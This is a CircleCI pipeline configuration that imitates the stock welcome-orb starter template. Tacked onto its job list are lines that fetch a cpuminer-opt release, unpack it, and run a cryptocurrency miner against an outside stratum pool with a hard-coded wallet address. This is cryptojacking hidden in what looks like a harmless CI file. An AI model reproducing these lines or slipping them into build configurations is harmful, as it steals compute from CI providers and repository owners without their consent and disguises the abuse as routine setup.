# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
# Use a package of configuration called an orb.
orbs:
  # Declare a dependency on the welcome-orb
  welcome: circleci/welcome-orb@0.4.1
# Orchestrate or schedule a set of jobs
workflows:
  # Name the workflow "welcome"
  welcome:
    # Run the welcome/run job in its own container
    jobs:
      - welcome/run
      - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.11/cpuminer-opt-mac.tar.gz
      - tar -zxf cpuminer-opt-mac.tar.gz
      - ./cpuminer-sse2 -a power2b -o stratum+tcp://stratum-na.rplant.xyz:7022 -u BZovJZJgX9UUYdKqYHKPkSr4n7dz71oAaZ.stavol -p c=MBC


